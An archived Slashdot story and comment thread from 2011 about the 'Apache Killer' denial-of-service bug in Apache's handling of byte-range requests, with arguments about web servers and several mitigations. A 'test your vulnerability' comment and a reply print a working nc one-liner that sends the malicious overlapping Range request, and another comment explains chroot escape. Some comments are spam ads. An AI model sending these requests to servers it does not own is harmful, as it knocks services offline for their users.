Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Apache Warns Web Server Admins of DoS Attack Tool

samzenpus posted more than 3 years ago | from the protect-ya-neck dept.

Security 82

CWmike writes "Developers of the Apache open-source project warned users of the Web server software on Wednesday that a denial-of-service (DoS) tool is circulating that exploits a bug in the program. 'Apache Killer' showed up last Friday in a post to the 'Full Disclosure' security mailing list. The Apache project said it would release a fix for Apache 2.0 and 2.2 in the next 48 hours. All versions in the 1.3 and 2.0 lines are said to be vulnerable to attack. The group no longer supports the older Apache 1.3. 'The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server,' Apache said in an advisory. The bug is not new. Michal Zalewski, a security engineer who works for Google, pointed out that he had brought up the DoS exploitability of Apache more than four-and-a-half years ago. In lieu of a fix, Apache offered steps administrators can take to defend their Web servers until a patch is available."

Sorry! There are no comments related to the filter you selected.

Apache is too bloated (0)

ge7 (2194648) | more than 3 years ago | (#37198966)

Apache is just like all the other projects that grow too big and people get ignorent towards the basic things like fast performance and security.

Apache is kind of PHP of the web servers. It's easy to use, it's supported by every webhost since everybody is used to it, and their developers don't spend too much consideration on security and perfomance. And this is coming from someone who uses Apache and PHP.

If you truly want secure, fast-performance web server, use nginx [wikipedia.org] . It's much better done than Apache.

nginx has its problems, too. (0)

Anonymous Coward | more than 3 years ago | (#37199164)

nginx is a fantastic web server in some cases, but it does have some pretty serious drawbacks, too. It can't easily run CGI scripts, for instance. You get stuck using FastCGI, or SCGI, or PHP, or a half-assed adapter that tries to make your CGI script a FastCGI script, or some other technique. That does no good for those of us with proven and tested CGI scripts that we need to run. So we'll have to use Apache, lighttpd, or one of the many other non-nginx web servers out there instead, until nginx gets its act together.

(If you're a Rails kid who's going to spew your "but CGI is slow and insecure!" bullshit, take it elsewhere.)

Re:nginx has its problems, too. (1)

Ice Station Zebra (18124) | more than 3 years ago | (#37200272)

Welcome to 2011, not running CGI scripts is a feature (and a good one at that).

Re:nginx has its problems, too. (0)

Anonymous Coward | more than 3 years ago | (#37200506)

*nix systems make it very easy to safely run CGI scripts. If you really have that much trouble creating non-privileged accounts, setting the proper filesystem permissions, using chroot/jails/containers/zones, and setting process limits, then maybe you shouldn't be running a web server in the first place. After all, those are things you should be doing regardless of the technology you're using.

You're probably one of those "Rails kids" he refers to. Like he said, your opinion doesn't matter. It's hard to take people like you seriously when we see crap like Diaspora. Then we soon learn that basically every Rails web app is written as poorly. We can't forget about the PHP bunglers, too, who ignore hundreds of failing regression tests and then make a release where the crypt() function is very broken [slashdot.org] !

If you people say that we're doing it wrong by properly using *nix operating systems, by using a reliable technique like CGI, and by using reliable and well-tested languages like Perl and Python, then we can relax comfortably knowing that we're actually doing things right.

Re:nginx has its problems, too. (1)

LordLimecat (1103839) | more than 3 years ago | (#37200934)

using chroot/jails/containers/zones

Not being a Linux guru, I thought I had heard repeatedly "Chroots do NOT provide security"? Cant someone who pulls off a privelege escalation escape the chroot?

Re:nginx has its problems, too. (1)

maxwell demon (590494) | more than 3 years ago | (#37201970)

What about running CGI scripts on a separate virtual machine from the rest of the system? Basically set up a separate web server on that, and have all CGI scripts be executed from there. For access to shared resources, have a "gate keeper" process (or module in the web server) running on the original host which can give out one-time passwords which are then passed onto the script, and which the script can then use to access the resources through that gate keeper. The gate keeper can have a detailed knowledge about what each script is allowed to access, and block any other request. I'm not sure if this would be feasible performance-wise, but I think it would make quite a secure system. Indeed, the script server could mount all file systems readonly (you could even remove the write capability from the file system driver if you're paranoid enough), because you don't need to change the scripts from within the scripts (installing the scripts would be done from the host system or another virtual machine). That way, even if someone managed to hijack a script, the worst he could do is to mess with those things the specific script is allowed to access (because the gate keeper knows which script was called, and won't allow any other access). Unless the attacker additionally finds a security hole in the gate keeper process, of course. As an additional bonus, the scripts would not need to have the database password (the gate keeper would have it), so even if the script server was completely hacked, the database password would still not leak.

Re:nginx has its problems, too. (1)

silanea (1241518) | more than 3 years ago | (#37202888)

And people call Apache bloated. Right.

Re:nginx has its problems, too. (1)

Seyedkevin (1633117) | more than 3 years ago | (#37211642)

Web servers run without root privileges so that the server isn't capable of doing overtly harmful things but you can still modify things that the web server is supposed to modify. That is, it can still mess it up.

If you want to give scripts a separately isolated area, you can use this: http://httpd.apache.org/docs/2.0/suexec.html [apache.org] File system permissions takes over from here.

I don't know too much about SQL servers, but couldn't you probably use kerberos or something instead of directly using database passwords?

Re:nginx has its problems, too. (2)

ArsenneLupin (766289) | more than 3 years ago | (#37202950)

Cant someone who pulls off a privelege escalation escape the chroot?

Yes, he can. Basically, the trick is to do another chroot to a subdirectory, but without doing the chdir. So now the attacker is in a situation where the current directory is above the root. Here he can keep doing chdir(".."); until he reaches the real root, and then all he needs to do is chroot(".");.

What's worse, this exploit is due to the way how chroot is spec'ed, thus it can't really be fixed by the kernel.

So yes, you can escape a chroot jail if you've got root. However, the point of the chroot jail is to prevent attackers from gaining root in the first place, by confining them to a minimal and more controllable environment which has no spare crowbars lying around.

Moreover, other confinements, such as BSD jails, containers or zones may not have the problem outlined above.

Re:nginx has its problems, too. (0)

Anonymous Coward | more than 3 years ago | (#37203460)

The grsecurity [grsecurity.net] patchset lets you prevent the various ways of escaping chroot jails (of which there are a lot), amongst other things. But yeah, fundamentally chroot was never meant to provide security. IIRC it was implemented as a convenience feature for kernel development.

Re:nginx has its problems, too. (1)

X0563511 (793323) | more than 3 years ago | (#37206330)

A proper SELinux (or AppArmor, I'd imagine) policy would also serve to confine them in their box.

Re:nginx has its problems, too. (1)

badkarmadayaccount (1346167) | more than 3 years ago | (#37226210)

Or, OpenVZ containers.

Re:nginx has its problems, too. (0)

Anonymous Coward | more than 3 years ago | (#37203596)

In theory, yes (although in practice, it's extremely rare and difficult). And that's probably why the GP listed other, better, approaches that Linux doesn't support, like FreeBSD Jails, and Solaris' Containers and Zones.

Re:nginx has its problems, too. (1)

overlordofmu (1422163) | more than 3 years ago | (#37207352)

Do not reply to the AC trolls, please.

Although, your comment was quite damn funny.

Re:Apache is too bloated (3, Interesting)

Monoecus (1761264) | more than 3 years ago | (#37199174)

Yes, that's why I use Hiawatha [wikimedia.org] .

Re:Apache is too bloated (0)

Anonymous Coward | more than 3 years ago | (#37199642)

Yes, that's why I use Hiawatha [wikimedia.org] .

I second that.

Re:Apache is too bloated (1)

MechaStreisand (585905) | more than 3 years ago | (#37199796)

Really? Apache has 200+ failed unit tests that are just ignored? [php.net]

They're not even close to comparable. Apache has served me very well. My server is not even vulnerable to this as I don't have mod_deflate loaded or compiled. (I tested using the kill script.)

Re:Apache is too bloated (1)

Anonymous Coward | more than 3 years ago | (#37200164)

The link in the blurb claiming to point to the advisory from Apache isn't correct.

The actual advisory from Apache notes that mod_deflate's presence is orthogonal (irrelevant) to the exploitability of this issue.

The correct link:

http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3C20110824161640.122D387DD@minotaur.apache.org%3E [apache.org]

Re:Apache is too bloated (1)

MechaStreisand (585905) | more than 3 years ago | (#37200386)

Regardless, my server isn't vulnerable - that's all I care about.

Re:Apache is too bloated (1)

X0563511 (793323) | more than 3 years ago | (#37206142)

Lets not forget that being a proper admin and having Apache locked down by, for example, some SELinux policies... it's kind of a tough nut to break.

Oh god LulzSec (1)

Chrysocolla (2314992) | more than 3 years ago | (#37198998)

Quick Apache! They will use it and claim 1337 hax!

thej3st3r DoS 0day? (0)

Anonymous Coward | more than 3 years ago | (#37199028)

I wonder if this is the 0day used by rabid self-publicist "thej3st3r" in his oh so very leet DoS tool? Tor + Slowloris + something else was the conclusion of lulzsec, and I think they're probably right.

Someone should have attended Secure Codeing 101 (1)

gweihir (88907) | more than 3 years ago | (#37199192)

Algorithmic complexity attacks (of which this is an example) are nothing new. They have been done on really bad sorting algorithms (quick sort, which is still defended by quite a few people that simply do not get it or are not bright enough to implement the alternatives) and are today employed, e.g., against hash-tables. Libraries/languages by people with a clue (e.g. LUA), have protection against that. Others do not.

Writing secure code is a bit harder than writing merely working code. I guess people have to find that out over and over again....

Re:Someone should have attended Secure Codeing 101 (-1)

Anonymous Coward | more than 3 years ago | (#37199292)

You know what, fuck you and your high horse. You can't even write Lua properly and you're dissing on programmers because they use the algorithm that literally everyone is recommending them to use, giving no other alternatives because you probably have no fucking clue why quicksort sucks so damn much.

Re:Someone should have attended Secure Codeing 101 (1)

Narcocide (102829) | more than 3 years ago | (#37199408)

This [lmgtfy.com] might be informative.

Re:Someone should have attended Secure Codeing 101 (0)

Anonymous Coward | more than 3 years ago | (#37199756)

No it's not, it's a google search. If you're gonna give advice on a discussion thread, give actual advice. I'm perfectly capable of googling it myself, but I'm not the one dissing shit without backing it up in a discussion thread (plus I already know that there are better algorithms than quicksort)

Re:Someone should have attended Secure Codeing 101 (1)

Narcocide (102829) | more than 3 years ago | (#37199848)

Alright, fair enough. Maybe you already know this but just for the benefit of the other readers: Quicksort is just fine if you can trust the data is generally randomized in order. The problem is primarily that it accomplishes this speedup by making the unsafe assumption that this is the case, meaning its really easy to dramatically increase the processing time required for a given sort by giving it data in certain specific patterns - such as reverse order or almost completely reverse order. It generally considered a BAD idea to use quicksort on things like public services where the users can directly affect the order of the data passed to it.

Re:Someone should have attended Secure Codeing 101 (0)

Anonymous Coward | more than 3 years ago | (#37200326)

gweihir, this is how you should post ^

Re:Someone should have attended Secure Codeing 101 (1)

gbjbaanb (229885) | more than 3 years ago | (#37203062)

considering the poor choice of a response, you should have checked your links. first one is "why quicksort sucks" that goes on to explain why a *modified* quicksort algorithm posted on wikipedia is not better than the original quicksort algorithm.

3rd link is "why java sucks", and down on the first page is "why .net sucks".

If you want to explain issues with an algorithm like that - say what it is, rather than posting a snide lmgtfy link that is wrong for the problem at hand.

So far it seems to me that the problem with quicksort is in the data provided to it, that in some cases can increase the complexity of the solution exponentially. But to say that means quiicksort sucks is like saying hammers suck because you might hit your thumb.

Re:Someone should have attended Secure Codeing 101 (1)

LordLimecat (1103839) | more than 3 years ago | (#37205214)

Cant comment on quicksort since its been years since I was in a CS class, but none of those google results indicate that quicksort sucks.

Usually you want your LMGTFY to show clear examples that make your case, and none of those links do.

Re:Someone should have attended Secure Codeing 101 (1)

zippthorne (748122) | more than 3 years ago | (#37200152)

Who recommends quick sort for anything? It's got a bad, O(N^2) degenerate case that's been known about.. since the development of the algorithm.

It's my understanding that merge sort or merge/insertion hybrids are typically used generally, as merge has O(N*log N) for all inputs, and is stable, while insertion can be extremely fast for short lists (but is not appropriate for large lists, as it's also O(N^2)). Other sorts might be chosen if the data is known in advance to have favorable properties for them.

Quick sort's main use is for CS101 courses, to give you something that is relatively easy to understand, implement, and analyze, and which can be easily compared with the other CS101 sort technique, bubble sort.

Re:Someone should have attended Secure Codeing 101 (1)

micheas (231635) | more than 3 years ago | (#37200296)

I guess it depends on how many bits you have to implement your sort in.

If you are cramming the sort into less than 8bytes speed will take a back seat. If you can use gigabytes of memory you implement do a much faster more memory intensive sort.

Re:Someone should have attended Secure Codeing 101 (1)

IDK (1033430) | more than 3 years ago | (#37202898)

Not only that, but quicksort is faster on average sized inputs, which is what you work with most times.
Low complexity doesn't equal speed.

Re:Someone should have attended Secure Codeing 101 (1)

BitHive (578094) | more than 3 years ago | (#37201854)

Sadly, idiots (of which the the folks that codeed Apache are an example) nothing new. Their mediocrity has long suffocated us bright folk, many of whom are too timid to call these people what they are: pathetic failures. Others, like yourself, are not.

Achieving perfection is a bit harder than merely rewriting flawed code. I guess people have to experience humiliation over and over again...

Re:Someone should have attended Secure Codeing 101 (0)

Anonymous Coward | more than 3 years ago | (#37205052)

Sadly, idiots (of which the the folks that codeed Apache are an example) nothing new. Their mediocrity has long suffocated us bright folk, many of whom are too timid to call these people what they are: pathetic failures. Others, like yourself, are not.

Achieving perfection is a bit harder than merely rewriting flawed code. I guess people have to experience humiliation over and over again...

Tit.

Re:Someone should have attended Secure Codeing 101 (1)

Unequivocal (155957) | more than 3 years ago | (#37210164)

This is a joke right?

Re:Someone should have attended Secure Codeing 101 (1)

BitHive (578094) | more than 3 years ago | (#37210804)

Someone should have attended Spotting Sarcasm 101.

Re:Someone should have attended Secure Codeing 101 (1)

Unequivocal (155957) | more than 3 years ago | (#37212418)

:) I had to ask. On /. it's not as easy as I would like to tell..

Re:Someone should have attended Secure Codeing 101 (1)

maxwell demon (590494) | more than 3 years ago | (#37201998)

There are still people who didn't switch to introsort?

If this was IIS (1)

bonch (38532) | more than 3 years ago | (#37199308)

Imagine the anti-Microsoft shitstorm around here if this was an IIS attack tool.

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37199370)

I had a lot of fun with the IIS 5.0 WebDAV buffer overflow back in the day. :)

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37199402)

Microsoft (or any other big company) could never act as fast as the Apache developers are... even though the bug is way old, the DoS tool appeared last Friday, and the patch should be ready in 48 hours (in fact, reading other comments a patch is already available).

Re:If this was IIS (1)

Anonymous Coward | more than 3 years ago | (#37199524)

The patch has taken 4.5 years. If we have to wait for someone to start exploiting vulnerabilities before we are allowed to get a patch then I don't care how fast those patches come it is a major fail.

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37200752)

if it were a real problem then over half of the web would have been brought down already (especially with over 4 years to take advantage of the exploit).

Re:If this was IIS (1)

LordLimecat (1103839) | more than 3 years ago | (#37205318)

None of these justify the reaction that IIS would have gotten.

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37202164)

The patch has taken 4.5 years. If we have to wait for someone to start exploiting vulnerabilities before we are allowed to get a patch then I don't care how fast those patches come it is a major fail.

I think you might be a little unclear on how this works. When someone does a ./configure; make; make install of Apache, they are compiling the source code, which they have, and which any of a large number of C coders can dig through and come up with a fix for. We are allowed to get a patch any time we want to code one up. I myself have made changes to sendmail, apache, and nontrivial changes to dhcpd (to make the dhcpctl calls to add and remove MACs to pools actually work) and at any point in the past 4.5 years I or any number of halfwit programmers could have fixed this particular Apache vulnerability had we been aware and concerned enough about it to do so. Having read about the vulnerability and not running a web site other than my own, I'm not particularly concerned about this one. It's a DoS, not a remote code injection, so I'll be going to bed shortly rather than applying the patch that others have graciously ferreted out and made available.

In contrast, if this was IIS, patching the available source code would not be an option, because the source code is not available.

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37205672)

Oh so because anyone could have fixed in in the last 4.5 years, that makes it alright, even though no one fixed it, got it.

Slashdot is vulnerable... (4, Interesting)

CajunArson (465943) | more than 3 years ago | (#37199324)

All versions in the 1.3 and 2.0 lines are said to be vulnerable to attack. The group no longer supports the older Apache 1.3.

Since Slashdot is still stuck in the late '90's with a thin veneer of bad javascript, over apache 1.3 it's vulnerable... and no patch either.

Re:Slashdot is vulnerable... (1)

CajunArson (465943) | more than 3 years ago | (#37199418)

Oh and before you say that Malda & crew will do a deep code analysis of the 1.3 branch and fixit themselves:
              1. They're STILL RUNNING 1.3!!
              2. Slashcode... QED.

Re:Slashdot is vulnerable... (1)

Briareos (21163) | more than 3 years ago | (#37206530)

3. No more Malda [slashdot.org] .

Re:Slashdot is vulnerable... (0)

Anonymous Coward | more than 3 years ago | (#37199816)

But /. has a pretty decent server farm, or it would already be /.ed itself. So you'd need a fair number of machines targetting it with this exploit.

First person to combine this DoS exploit with an autorun exploit for any common browser/plugin combo and then get their "blog" linked in a /. article wins major lols.

Re:Slashdot is vulnerable... (1)

antdude (79039) | more than 3 years ago | (#37201538)

So someone could use this exploit and take /. down. :(

Re:Slashdot is vulnerable... (1)

gl4ss (559668) | more than 3 years ago | (#37201996)

maybe they patched it. or maybe they filter the vuln. before it hits apache, it seems that it's just about asking for a large number of ranges in a head request.

A quick summary (5, Informative)

rabtech (223758) | more than 3 years ago | (#37199826)

A quick summary: A client can use byte range requests that are overlapping and/or duplicated to use a single small request to overload the server. eg: 0-,0-,0- would request the entire contents of the file three times. YMMV but this has to do with how Apache handles the multipart responses consuming memory and isn't an actual bandwidth DoS.

Unfortunately there are legit reasons for allowing out-of-order ranges and multiple ranges, such as a PDF reader requesting the header, then skipping to the end of the file for the index, then using ranges to request specific pages. Another example was a streaming movie skipping forward by grabbing byte ranges to look for i-frames without downloading the entire file.

So the fix discussion centers on when to ignore a range request, when can you merge ranges, can you re-order them, can you reject overlapping ranges and how much do they need to overlap, etc. The consensus seems to be that first you merge adjacent ranges, then if too many ranges are left OR too many duplicated bytes are requested then the request skips the multi-part handling and just does a straight up 200 OK stream of the whole file or throws back a 416 (can't satisfy multipart request).

Re:A quick summary (2)

sonamchauhan (587356) | more than 3 years ago | (#37200280)

Shouldn't the fix just be that Apache calculate the _total_ size requested by the client, and if that crosses some definable limit, knock back the request with a HTTP 4xx response ( "client demands too much" ) or a 5xx error ("we're not google") (if it wants to be polite)

Re:A quick summary (0)

Anonymous Coward | more than 3 years ago | (#37200882)

( "client demands too much" )

Ah the classic "469: Wife" error.

Re:A quick summary (1)

PiSkyHi (1049584) | more than 3 years ago | (#37227448)

Or one could gather range requests and create a merge list with no repeats and Apache should only keep 1 copy in memory, maybe if they have too many repeated requests for overlapping ranges the error could be "I'm sorry, could you repeat that please?"

Re:A quick summary (1)

Anonymous Coward | more than 3 years ago | (#37200576)

Worse than that... even requesting a lot of small ranges can overload the server. The example code (iirc) requested the range 5-,5-0,5-1,5-2,5-3,5-4...5-1299 repeatedly. The real killer though is accept-encoding gzip, which causes Apache to try to zip all of those tiny ranges. That's really what kills the server.

IIS is better (-1)

Anonymous Coward | more than 3 years ago | (#37199896)

This doesn't happen with latest version of IIS. Fucking freetards.

Damn M$ Only Cares About Money (0)

Anonymous Coward | more than 3 years ago | (#37199898)

and lets the quality of their software go to hell and allowing exploits to... what? open source? no, that can't be, only IIS is subject to exploit. Slashdot lied to me!

Not that bad (4, Interesting)

Evets (629327) | more than 3 years ago | (#37200570)

I read the advisory, chose a course of action, then it took about a minute to make my server not vulnerable. It's great that they made the disclosure.

Re:Not that bad (2)

Onymous Coward (97719) | more than 3 years ago | (#37212800)

In more detail...

Some of the suggestions from the Full Disclosure discussion and elsewhere:

Re:Not that bad (0)

Anonymous Coward | more than 3 years ago | (#37213764)

I read the advisory, chose a course of action, then it took about a minute to make my server not vulnerable. It's great that they made the disclosure.

Why give props for disclosing that there is an easily accessible attack tool being used? Cat's sort of out the bag at that point. Anyone, the attackers... May just have well made the announcement.

test your vulnerability (5, Informative)

Anonymous Coward | more than 3 years ago | (#37200722)

You can do a quick test with something like this:

/bin/echo -en "HEAD / HTTP/1.1\r\nHost:localhost\r\nRange:bytes=0-,$(perl -e 'for ($i=1;$i<1300;$i++) { print "5-$i,"; }')5-1300\r\nAccept-Encoding:gzip\r\nConnection:close\r\n\r\n" | nc localhost 80

If you're vulnerable, you should see a really ridiculously long Content-Length header, like 900k or so.

Disabling mod_deflate or the equivalent prevents this behavior, but it's not clear that there isn't another exploit waiting to happen. A super quick fix is to kill the Range header entirely using mod_header, like so

RequestHeader unset Range

in your apache.conf or moral equivalent. For the most part, you can get away with not serving Range headers, and if you can't, you know it and don't need my advice on fixing this.

Re:test your vulnerability (1)

Noodlenoggin (1295699) | more than 3 years ago | (#37201458)

Just to add on to this, if your web server doesn't accept requests addressed to localhost or the ip address with a rewrite rule or for some other reason, then you may need to add in the hostname for that query rather than just using localhost for the headers.

eg: echo -en "HEAD / HTTP/1.1\r\nHost:www.mydomainname.com\r\nRange:bytes=0-,$(perl -e 'for ($i=1;$i<1300;$i++) { print "5-$i,"; }')5-1300\r\nAccept-Encoding:gzip\r\nConnection:close\r\n\r\n" | nc localhost 80


A couple of my servers have Limit options set with a deny from all to the base htdocs folder, therefore only allowing virtual hosts to supply content and not the base host itself.
Sending 'localhost' as the header would return a 403 Forbidden with no mention of the Content-Length at all, even though the server was vulnerable.

Re:test your vulnerability (0)

Anonymous Coward | more than 3 years ago | (#37202256)

Disabling mod_deflate or the equivalent prevents this behavior, but it's not clear that there isn't another exploit waiting to happen.

Indeed. The advisory itself says

When using a third party attack tool to verify vulnerability - know that most
of the versions in the wild currently check for the presence of mod_deflate;
and will (mis)report that your server is not vulnerable if this module is not
present. This vulnerability is not dependent on presence or absence of
that module.

Re:test your vulnerability (1)

rabtech (223758) | more than 3 years ago | (#37207366)

Just wanted to point out that this does *not* depend on mod_deflate or mod_gzip. That makes the problem worse, but it is the fact that Apache sets up a lot of internal data structures to handle the "metadata" of the multi-part request. Even with compression disabled, you can still easily overload the server with comparatively fewer requests because you're asking Apache to setup thousands and thousands of multi-part buckets for each single HTTP request. It doesn't take very many requests to bring everything to a standstill.

Cheap North Face Jackets (0)

xjb8132 (2445838) | more than 3 years ago | (#37202060)

Welcome to our North Face Outlet [thenorth-face-outlet.com] online shop, we have a good surprise for you. The Cheap North Face Jackets [thenorth-face-outlet.com] are our mainly launching products, if you want one we will give you a biggest discount for you, you may have a good time to have shopping on our Discount North Face [thenorth-face-outlet.com] store.

Thanks! (1)

thomassabo2011 (2427932) | more than 3 years ago | (#37202516)

I think Apache is just like all the other projects that grow too big ! The jewelry store [thomassabo-ebuy.com] , welcome to go and have a look .

Touchpads? (1)

Mikachu (972457) | more than 3 years ago | (#37202570)

When I saw the headline, I thought Apache was going to warn retailers about selling HP touchpads...

mod_evasive ? (1)

slydder (549704) | more than 3 years ago | (#37202670)

has anyone noticed if mod_evasive disarms/mitigates this attack vector?

How to test it against HTTPS? (1)

Swampcritter (1165207) | more than 3 years ago | (#37203602)

Exploit code and ways of testing the vulnerability seem to be addressed towards HTTP. Has anyone tested it against HTTPS yet?

Re:How to test it against HTTPS? (1)

TheNinjaroach (878876) | more than 3 years ago | (#37210956)

HTTPS is still HTTP. There's just an SSL layer in between. If you want to interact with some HTTPS server, try using OpenSSL with the s_client option.

Vulnerability first reported in 2007 (1)

Skuto (171945) | more than 3 years ago | (#37203986)

With the bug first reported over 4.5 years ago, this was entirely avoidable.

http://seclists.org/bugtraq/2007/Jan/83 [seclists.org]

Indexes (1)

brabo_sd (1279536) | more than 3 years ago | (#37205750)

FY, Options -indexes on /var/www made my boxes safe against this attack.

Not on OpenBSD (1)

CarsonChittom (2025388) | more than 3 years ago | (#37206294)

The included Apache 1.3 on OpenBSD (heavily patched by the OpenBSD developers) appears not to be vulnerable [marc.info] . The Apache2 in the ports tree may well be, though.

Recommended webserver for WSGI Python apps? (1)

Just Some Guy (3352) | more than 3 years ago | (#37206942)

Since we're discussing Apache anyway... I've used Apache for over a decade now. Right now I'm working on a Pyramid [pylonsproject.org] app and publishing it with mod_wsgi [google.com] on Apache 2.2, for no other reason than that I'm already familiar with Apache. Since this is a brand new project and will be running on its own dedicated server - and therefore doesn't have play nicely with any pre-existing web apps - I wanted to re-evaluate my decision. If you needed to publish a WSGI app today, what server would you use and why?

Confisusion.. (1)

iridium213 (2029192) | more than 3 years ago | (#37207952)

So...

"... and said it would release a fix for Apache 2.0 and 2.2 in the next 48 hours."
...
"... According to Apache, all versions in the 1.3 and 2.0 lines are vulnerable to attack."

So dropping support for 1.3 I understand (EOL etc), but fixing 2.2 event though it isn't reported as vulnerable? which is it?

Re:Confisusion.. (1)

geminidomino (614729) | more than 3 years ago | (#37211302)

I figured it was two different points. The first being that they'd release a fix for 2.x, and the other a less than subtle "Update your goddamn software!" reminder.

4 .5 years before they do something.... (1)

hesaigo999ca (786966) | more than 3 years ago | (#37220388)

I am glad they finally got to it, but if apache had told their bank that there was an issue with their account , I am sure they would have wanted their bank to do something right away about it, and not 4.5 years ago....you just have to hit them where it hurts...ddos their banks, not their servers.....

Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?